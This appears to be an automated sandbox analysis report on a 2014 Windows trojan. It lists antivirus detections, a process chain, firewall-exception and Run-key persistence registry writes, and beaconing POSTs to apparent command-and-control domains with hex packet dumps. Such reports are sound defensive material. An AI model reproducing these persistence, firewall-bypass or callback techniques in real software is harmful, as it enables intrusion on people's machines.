Analysis Date: 2014-11-10 17:10:26
MD5: 1a6f13379c2ef7eb8f32b3f4b8fca416
SHA1: c8a7c1788b061236a6a7aa6a9be8d912d9546936

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .rr md5: 3eea566760eae7d167141b07377a320f sha1: e54a2b7860a54d4c0491bbace6aa3e42ccdb956e size: 512
Section .bk md5: 7c3a703142155c71e5bd959a85fa27bd sha1: 55f006b4bae5935686906c612efcdba682025fee size: 2560
Section .h md5: f8a18ca2fdc49ed2c75bfc10815e10e6 sha1: ed696d08c3f1ae4c76d7bb4326581e2269cf0ea5 size: 3584
Section .nfzeiay md5: a4f9c89a166d66fbd5da35c887423ee9 sha1: 28266d584aeaf26d84136897bad38a0e373b8a0a size: 30720
Section .hzhd md5: 054750cb61ff21ce486efce77bd77221 sha1: 0bcd867ca4f2d686e1f01c4672cc165ef4e9aba1 size: 2048
Timestamp: 2014-05-11 21:13:45
Packer: FASM v1.5x
PEhash: 18eee901b503840988f1dcbc67fabd7a27742309
IMPhash: c959caff6dd0463afbd08d3c2e8b197c
AV 360 Safe: Gen:Variant.Kazy.396140
AV Ad-Aware: Gen:Variant.Kazy.396140
AV Alwil (avast): no_virus
AV Arcabit (arcavir): no_virus
AV Authentium: no_virus
AV Avira (antivir): no_virus
AV BullGuard: Gen:Variant.Kazy.396140
AV CA (E-Trust Ino): no_virus
AV CAT (quickheal): no_virus
AV ClamAV: no_virus
AV Dr. Web: no_virus
AV Emsisoft: Gen:Variant.Kazy.396140
AV Eset (nod32): Win32/Kryptik.CCNG
AV Fortinet: W32/Simda.ACR!tr
AV Frisk (f-prot): no_virus
AV F-Secure: Gen:Variant.Kazy.396140
AV Grisoft (avg): no_virus
AV Ikarus: no_virus
AV K7: no_virus
AV Kaspersky: Trojan.Win32.Generic
AV MalwareBytes: Trojan.Agent
AV Mcafee: no_virus
AV Microsoft Security Essentials: no_virus
AV MicroWorld (escan): Gen:Variant.Kazy.396140
AV Norman: Gen:Variant.Kazy.396140
AV Rising: no_virus
AV Sophos: no_virus
AV Symantec: no_virus
AV Trend Micro: no_virus
AV VirusBlokAda (vba32): no_virus

Runtime Details:

Process
↳ C:\malware.exe

Creates Process: C:\WINDOWS\system32\msiexec.exe

Process
↳ C:\WINDOWS\system32\msiexec.exe

Registry: HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list\C:\WINDOWS\system32\msiexec.exe ➝
C:\WINDOWS\system32\msiexec.exe:*:Generic Host Process\\x00
Registry: HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\Policies\Explorer\Run\36874 ➝
c:\Documents and Settings\All Users\dxirrfdaq.exe\\x00
Creates File: pipe\2872114278
Creates File: PIPE\lsarpc
Creates File: c:\Documents and Settings\All Users\dxirrfdaq.exe
Deletes File: c:\c8a7c1~1.exe
Creates Process: c:\Documents and Settings\All Users\dxirrfdaq.exe

Process
↳ c:\Documents and Settings\All Users\dxirrfdaq.exe

Creates Process: C:\WINDOWS\system32\svchost.exe

Process
↳ C:\WINDOWS\system32\svchost.exe

Registry: HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list\C:\WINDOWS\system32\svchost.exe ➝
C:\WINDOWS\system32\svchost.exe:*:Generic Host Process\\x00
Creates File: \Device\Afd\Endpoint
Creates File: \Device\Afd\AsyncConnectHlp
Winsock DNS: ihave5kbtc.org
Winsock DNS: ihave5kbtc.biz
Winsock DNS: road-to-dominikana.biz
Winsock DNS: road-to-dominikana.in

Network Details:

DNS: update.microsoft.com.nsatc.net
Type: A
65.55.138.126
DNS: update.microsoft.com.nsatc.net
Type: A
65.55.138.186
DNS: road-to-dominikana.in
Type: A
192.42.116.41
DNS: road-to-dominikana.biz
Type: A
62.76.41.238
DNS: ihave5kbtc.biz
Type: A
62.76.45.30
DNS: ihave5kbtc.org
Type: A
62.76.41.238
DNS: update.microsoft.com
Type: A
HTTP POST: http://road-to-dominikana.in/a_news/stats.php
User-Agent: Mozilla/4.0
HTTP POST: http://road-to-dominikana.biz/a_news/stats.php
User-Agent: Mozilla/4.0
HTTP POST: http://ihave5kbtc.biz/a_news/stats.php
User-Agent: Mozilla/4.0
HTTP POST: http://ihave5kbtc.org/a_news/stats.php
User-Agent: Mozilla/4.0
Flows TCP: 192.168.1.1:1033 ➝ 65.55.138.126:80
Flows UDP: 192.168.1.1:1034 ➝ 8.8.4.4:53
Flows TCP: 192.168.1.1:1035 ➝ 192.42.116.41:80
Flows UDP: 192.168.1.1:1036 ➝ 8.8.4.4:53
Flows TCP: 192.168.1.1:1037 ➝ 62.76.41.238:80
Flows UDP: 192.168.1.1:1038 ➝ 8.8.4.4:53
Flows TCP: 192.168.1.1:1039 ➝ 62.76.45.30:80
Flows UDP: 192.168.1.1:1040 ➝ 8.8.4.4:53
Flows TCP: 192.168.1.1:1041 ➝ 62.76.41.238:80

Raw Pcap
0x00000000 (00000)   504f5354 202f615f 6e657773 2f737461   POST /a_news/sta
0x00000010 (00016)   74732e70 68702048 5454502f 312e310d   ts.php HTTP/1.1.
0x00000020 (00032)   0a436f6e 74656e74 2d547970 653a2061   .Content-Type: a
0x00000030 (00048)   70706c69 63617469 6f6e2f78 2d777777   pplication/x-www
0x00000040 (00064)   2d666f72 6d2d7572 6c656e63 6f646564   -form-urlencoded
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000060 (00096)   6f73650d 0a557365 722d4167 656e743a   ose..User-Agent:
0x00000070 (00112)   204d6f7a 696c6c61 2f342e30 0d0a486f    Mozilla/4.0..Ho
0x00000080 (00128)   73743a20 726f6164 2d746f2d 646f6d69   st: road-to-domi
0x00000090 (00144)   6e696b61 6e612e69 6e0d0a43 6f6e7465   nikana.in..Conte
0x000000a0 (00160)   6e742d4c 656e6774 683a2037 360d0a43   nt-Length: 76..C
0x000000b0 (00176)   61636865 2d436f6e 74726f6c 3a206e6f   ache-Control: no
0x000000c0 (00192)   2d636163 68650d0a 50726167 6d613a20   -cache..Pragma: 
0x000000d0 (00208)   6e6f2d63 61636865 0d0a0d0a 41364565   no-cache....A6Ee
0x000000e0 (00224)   39567068 316c4a6a 38493776 58426759   9Vph1lJj8I7vXBgY
0x000000f0 (00240)   34615534 496b757a 4931534c 485a6b71   4aU4IkuzI1SLHZkq
0x00000100 (00256)   4c696948 4f316468 56554654 736c3051   LiiHO1dhVUFTsl0Q
0x00000110 (00272)   52746d2b 77643648 73723852 7044732f   Rtm+wd6Hsr8RpDs/
0x00000120 (00288)   35575939 6e773d3d                     5WY9nw==

0x00000000 (00000)   504f5354 202f615f 6e657773 2f737461   POST /a_news/sta
0x00000010 (00016)   74732e70 68702048 5454502f 312e310d   ts.php HTTP/1.1.
0x00000020 (00032)   0a436f6e 74656e74 2d547970 653a2061   .Content-Type: a
0x00000030 (00048)   70706c69 63617469 6f6e2f78 2d777777   pplication/x-www
0x00000040 (00064)   2d666f72 6d2d7572 6c656e63 6f646564   -form-urlencoded
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000060 (00096)   6f73650d 0a557365 722d4167 656e743a   ose..User-Agent:
0x00000070 (00112)   204d6f7a 696c6c61 2f342e30 0d0a486f    Mozilla/4.0..Ho
0x00000080 (00128)   73743a20 726f6164 2d746f2d 646f6d69   st: road-to-domi
0x00000090 (00144)   6e696b61 6e612e62 697a0d0a 436f6e74   nikana.biz..Cont
0x000000a0 (00160)   656e742d 4c656e67 74683a20 37360d0a   ent-Length: 76..
0x000000b0 (00176)   43616368 652d436f 6e74726f 6c3a206e   Cache-Control: n
0x000000c0 (00192)   6f2d6361 6368650d 0a507261 676d613a   o-cache..Pragma:
0x000000d0 (00208)   206e6f2d 63616368 650d0a0d 0a413645    no-cache....A6E
0x000000e0 (00224)   65395670 68316c4a 6a384937 76584267   e9Vph1lJj8I7vXBg
0x000000f0 (00240)   59346155 34496b75 7a493153 4c485a6b   Y4aU4IkuzI1SLHZk
0x00000100 (00256)   714c6969 484f3164 68565546 54736c30   qLiiHO1dhVUFTsl0
0x00000110 (00272)   5152746d 2b776436 48737238 52704473   QRtm+wd6Hsr8RpDs
0x00000120 (00288)   2f355759 396e773d 3d                  /5WY9nw==

0x00000000 (00000)   504f5354 202f615f 6e657773 2f737461   POST /a_news/sta
0x00000010 (00016)   74732e70 68702048 5454502f 312e310d   ts.php HTTP/1.1.
0x00000020 (00032)   0a436f6e 74656e74 2d547970 653a2061   .Content-Type: a
0x00000030 (00048)   70706c69 63617469 6f6e2f78 2d777777   pplication/x-www
0x00000040 (00064)   2d666f72 6d2d7572 6c656e63 6f646564   -form-urlencoded
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000060 (00096)   6f73650d 0a557365 722d4167 656e743a   ose..User-Agent:
0x00000070 (00112)   204d6f7a 696c6c61 2f342e30 0d0a486f    Mozilla/4.0..Ho
0x00000080 (00128)   73743a20 69686176 65356b62 74632e62   st: ihave5kbtc.b
0x00000090 (00144)   697a0d0a 436f6e74 656e742d 4c656e67   iz..Content-Leng
0x000000a0 (00160)   74683a20 37360d0a 43616368 652d436f   th: 76..Cache-Co
0x000000b0 (00176)   6e74726f 6c3a206e 6f2d6361 6368650d   ntrol: no-cache.
0x000000c0 (00192)   0a507261 676d613a 206e6f2d 63616368   .Pragma: no-cach
0x000000d0 (00208)   650d0a0d 0a413645 65395670 68316c4a   e....A6Ee9Vph1lJ
0x000000e0 (00224)   6a384937 76584267 59346155 34496b75   j8I7vXBgY4aU4Iku
0x000000f0 (00240)   7a493153 4c485a6b 714c6969 484f3164   zI1SLHZkqLiiHO1d
0x00000100 (00256)   68565546 54736c30 5152746d 2b776436   hVUFTsl0QRtm+wd6
0x00000110 (00272)   48737238 52704473 2f355759 396e773d   Hsr8RpDs/5WY9nw=
0x00000120 (00288)   3d355759 396e773d 3d                  =5WY9nw==

0x00000000 (00000)   504f5354 202f615f 6e657773 2f737461   POST /a_news/sta
0x00000010 (00016)   74732e70 68702048 5454502f 312e310d   ts.php HTTP/1.1.
0x00000020 (00032)   0a436f6e 74656e74 2d547970 653a2061   .Content-Type: a
0x00000030 (00048)   70706c69 63617469 6f6e2f78 2d777777   pplication/x-www
0x00000040 (00064)   2d666f72 6d2d7572 6c656e63 6f646564   -form-urlencoded
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000060 (00096)   6f73650d 0a557365 722d4167 656e743a   ose..User-Agent:
0x00000070 (00112)   204d6f7a 696c6c61 2f342e30 0d0a486f    Mozilla/4.0..Ho
0x00000080 (00128)   73743a20 69686176 65356b62 74632e6f   st: ihave5kbtc.o
0x00000090 (00144)   72670d0a 436f6e74 656e742d 4c656e67   rg..Content-Leng
0x000000a0 (00160)   74683a20 37360d0a 43616368 652d436f   th: 76..Cache-Co
0x000000b0 (00176)   6e74726f 6c3a206e 6f2d6361 6368650d   ntrol: no-cache.
0x000000c0 (00192)   0a507261 676d613a 206e6f2d 63616368   .Pragma: no-cach
0x000000d0 (00208)   650d0a0d 0a413645 65395670 68316c4a   e....A6Ee9Vph1lJ
0x000000e0 (00224)   6a384937 76584267 59346155 34496b75   j8I7vXBgY4aU4Iku
0x000000f0 (00240)   7a493153 4c485a6b 714c6969 484f3164   zI1SLHZkqLiiHO1d
0x00000100 (00256)   68565546 54736c30 5152746d 2b776436   hVUFTsl0QRtm+wd6
0x00000110 (00272)   48737238 52704473 2f355759 396e773d   Hsr8RpDs/5WY9nw=
0x00000120 (00288)   3d355759 396e773d 3d                  =5WY9nw==

Strings
[0

!);>@@
00060;0J0g0v0
1 1K1o1~1
2"2'222H2Q2]2j2u2
3$383L3Z3`3m3w3
4(4/4<4N4_4l4t4
7|\^*G
8$8.888B8L8V8`8j8t8
8&Lz>g
9){<@@
9)3<@@
9)AAAA
9)l<@@@
9)z?@@@
>@@@,A
A)46@@
"A56jo
=AAAA@
AAAAAA
AAAA,e
AAAA,S
AABAAABAAABAAAA
A*BEAA
AbortPath
AddFontMemResourceEx
}au9a#z
CallNamedPipeA
CharUpperBuffA
CopyFileW
CreateICW
CreatePen
D7W}~V
DbgUiSetThreadDebugObject
DdEntry42
EditWndProc
EndDeferWindowPos
EndPage
EngPaint
EngTransparentBlt
ExitProcess
}F9AAA
f'9Zhw
FindFirstVolumeMountPointW
FONTOBJ_pvTrueTypeFontFile
fOwGR$
GDI32.DLL
GdiAddFontResourceW
GdiDllInitialize
GdiEntry15
GdiValidateHandle
GetAtomNameA
GetClassNameA
GetClipBox
GetCompressedFileSizeA
GetCurrentProcess
GetCurrentProcessId
GetFontUnicodeRanges
GetKeyboardLayout
GetLogicalDriveStringsA
GetModuleHandleA
GetNextDlgGroupItem
GetProcessId
GetProfileIntW
GetStringBitmapA
GetSystemRegistryQuota
GetSystemWow64DirectoryA
GetTempPathA
GetWindowRect
Gf@@AA
{.GQ-2J @
?@@@,H
H!V)`S
hXe H:o
h]$Y9:n
I)(@@@
I){@@@
I)&@@@
_i64toa
IAAA8$
I)AAAA
IA)AAAA
I)E?@@
IfAA@@,FnAABA
iGX*&%\
I)L@@@
I)Q>@@
I)s@@@
IsValidLanguageGroup
IsWow64Process
I@wOxK)k
$j!nlO
Jpg file corrupted!
J{VW5S
kernel32.dll
KillTimer
%K%Q[Q
L@7f*u$
LdrFlushAlternateResourceModules
M)4=@@@
M=AAAA#7
mJ+LK=9$
ModifyWorldTransform
mp9<Nzi
MultiByteToWideChar
@.nfzeiay
ntdll.DLL
NtNotifyChangeMultipleKeys
NtProtectVirtualMemory
NtQueryVolumeInformationFile
@@@@,O
OAAA=4
P@9ph;
Pa)9lC
Q),;@@
Qf@PAAD
QueueUserWorkItem
)r<@@D
RealGetWindowClassW
ReasonCodeNeedsBugID
RemoveFontMemResourceEx
RtlAbsoluteToSelfRelativeSD
RtlAddAccessDeniedObjectAce
RtlAllocateAndInitializeSid
RtlAreAnyAccessesGranted
RtlCreateUserProcess
RtlCreateUserThread
RtlDeNormalizeProcessParams
RtlEncodeSystemPointer
RtlExtendedIntegerMultiply
RtlExtendedMagicDivide
RtlFindClearRuns
RtlGetUnloadEventTrace
RtlInitNlsTables
RtlIpv4AddressToStringExW
RtlpUnWaitCriticalSection
RtlQueryInformationActiveActivationContext
RtlSecondsSince1980ToTime
RtlTimeToSecondsSince1970
RtlUlonglongByteSwap
RtlUnicodeStringToInteger
RtlValidateUnicodeString
RtlValidSid
s3/~30
SelectClipRgn
SetBitmapAttributes
SetBrushAttributes
SetClassLongW
SetCursorPos
SetDlgItemTextW
SetMapMode
SetShellWindow
SetTextAlign
SetVolumeLabelW
SetWindowRgn
ShowScrollBar
StartDocW
t+CJ@I
!This program cannot be run in DOS mode.
Tn"gaC
TranslateMDISysAccel
])u?@@
;&}u	fi
USER32.DLL
XLATEOBJ_cGetPalette
YJ.CQZ
ZwAddAtom
ZwCreateJobObject
ZwDeleteValueKey
ZwInitiatePowerAction
ZwLockFile
ZwProtectVirtualMemory
ZwQueryFullAttributesFile
ZwSetTimer
ZwSignalAndWaitForSingleObject
ZwWaitForDebugEvent